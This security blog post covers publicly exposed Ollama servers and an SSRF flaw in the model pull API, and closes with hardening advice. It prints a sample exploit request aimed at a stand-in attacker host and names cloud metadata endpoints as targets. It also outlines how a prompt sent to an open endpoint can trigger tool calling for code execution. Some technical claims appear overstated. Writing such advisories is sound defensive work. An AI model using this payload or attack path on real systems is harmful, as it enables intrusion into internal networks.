field note

The Local LLM Revolution Is a 175,000-Server Security Disaster

CVE-2026-5530 and the Ollama exposure crisis reveal that the 'run AI locally' movement has been deployed with the security hygiene of a mid-2000s PHP forum.

A dark server room with exposed network cables and rack-mounted hardware, blue LED status lights illuminating the scene

Researchers found 175,000 publicly exposed Ollama servers across 130 countries. Around half of those have tool calling enabled. Nobody asked for this, but here we are.

Ollama ships with no authentication by default. The binary binds to 127.0.0.1 if you’re careful, but 0.0.0.0 if you’re moving fast. The OLLAMA_HOST environment variable is a footgun so obvious it should come with a warning label. Spin up a quick LLM demo on a VPS, forward that port, and you’ve just contributed to a botnet of open AI inference endpoints. Not intentionally. Just frictionally. The path of least resistance leads directly to the public internet.

CVE-2026-5530: The SSRF That Compounds the Footgun

The Sentinel One vulnerability database published details on CVE-2026-5530 last week. It’s a server-side request forgery in Ollama’s Model Pull API, specifically in server/download.go. The flaw allows an authenticated remote attacker to craft requests that force the Ollama server to make arbitrary HTTP requests to destinations of the attacker’s choosing.

POST /api/pull HTTP/1.1
Host: <target-ollama-server:11434>
Content-Type: application/json

{"name": "model", "insecure": true, "url": "http://attacker-controlled-internal-service:8080/evil"}

The Ollama server, running with the privileges of whatever user launched it, will happily follow that redirect and make the request. From there, an attacker can probe internal microservices, read metadata endpoints on cloud infrastructure (AWS 169.254.169.254, GCP metadata), port-scan internal networks, or use the Ollama instance as a jump host into otherwise isolated network segments.

The CVSS score for this is medium, which tells you everything about how the industry weights SSRF. It’s a useful primitive in a system that shouldn’t exist in this configuration in the first place.

What Tool Calling Actually Means Here

Around 87,000 of those 175,000 exposed instances have tool calling enabled. Tool calling is Ollama’s mechanism for letting models invoke external functions, execute shell commands, hit arbitrary HTTP endpoints. It is, by design, a code execution primitive wrapped in natural language.

The attack surface looks like this:

  1. Attacker finds an exposed Ollama endpoint (Shodan, Censys, or just a port scan of cloud ranges)
  2. No authentication required. The API is open.
  3. Attacker sends a prompt that triggers tool calling, or exploits the SSRF to proxy requests through the Ollama host
  4. Model executes on the host with the permissions of the Ollama process
  5. Attacker now has arbitrary code execution, a pivot point into the internal network, and GPU resources for whatever they want

This is not theoretical. The NCC Group documented DNS rebinding attacks against Ollama a year ago. Wiz Research documented RCE via manifest injection (CVE-2024-37032, “Probllama”) in Docker deployments. The pattern has been consistent: Ollama was built for local inference on a developer’s machine, and the industry then stapled it onto cloud infrastructure without applying any of the controls that would normally accompany a networked service with code execution capabilities.

This Is the 2026 Equivalent of Exposed Docker APIs

If you were paying attention in 2015, you watched the same thing happen with Docker. The daemon API, when exposed without TLS client certificates, allowed trivial container escape and host compromise. Real attackers scanned for it. Botnets formed. Scripts ran. The documentation said not to do it. The tutorials did it anyway because it was faster.

The same sequence is playing out with Ollama. The tool is excellent for local inference. The deployment patterns emerging around it are a remake of the Docker era, complete with the same genre of security incident waiting to happen. The difference is that Ollama tool calling gives you code execution at a higher abstraction layer, with a more capable model behind it, on hardware that is more expensive to operate than a container.

The Fix Is Not Complicated

# Do not expose Ollama to the internet. Ever.
# If you need remote access, put it behind a reverse proxy with auth.
# nginx with basic auth, Cloudflare Access, tailscale, anything.

# Or at minimum, bind explicitly to localhost
OLLAMA_HOST=127.0.0.1

# If you must run networked, use TLS and a firewall
sudo ufw allow 192.168.1.0/24
sudo ufw deny 0.0.0.0/0

The hard part is not the implementation. The hard part is that the developer experience incentive structure points toward the insecure configuration. “It works on my machine” scales to “it works on my VPS” which scales to “it works exposed to 4 billion internet addresses.” Nobody set out to build 175,000 open AI compute nodes. It happened through a series of reasonable-seeming decisions made by different people at different times.

What This Means for the Local LLM Movement

The pitch for local inference has always been privacy, cost control, and avoiding API rate limits. Those are real benefits. But the security model of “your data never leaves your machine” only holds if your machine is not a networked endpoint that an attacker can reach and manipulate.

The Ollama ecosystem has been so focused on capability improvements (larger context windows, better quantization, new model support) that infrastructure security has been an afterthought. The ollama binary itself does not ship with any authentication layer. There is no mutual TLS guidance in the README. The default bind behavior assumes a world where the machine running Ollama is the machine using Ollama.

That world is gone. The 175,000 exposed servers are proof. The local LLM movement needs to decide whether it is building personal inference tools or deploying networked AI infrastructure. These are different problems with different security requirements. Treating a code-execution-enabled inference API as a personal tool that happens to be internet-accessible is how you get a 175,000-server security incident.

The vulnerability is in server/download.go. The exposure is on every cloud provider, every VPS, every forwarded home connection where someone wanted to test Llama 3 from their phone. The patch is OLLAMA_HOST=127.0.0.1.

If you are running Ollama on anything other than localhost, assume it is compromised and rebuild it with proper network controls. The 175,000-server sample size tells you what the threat landscape looks like.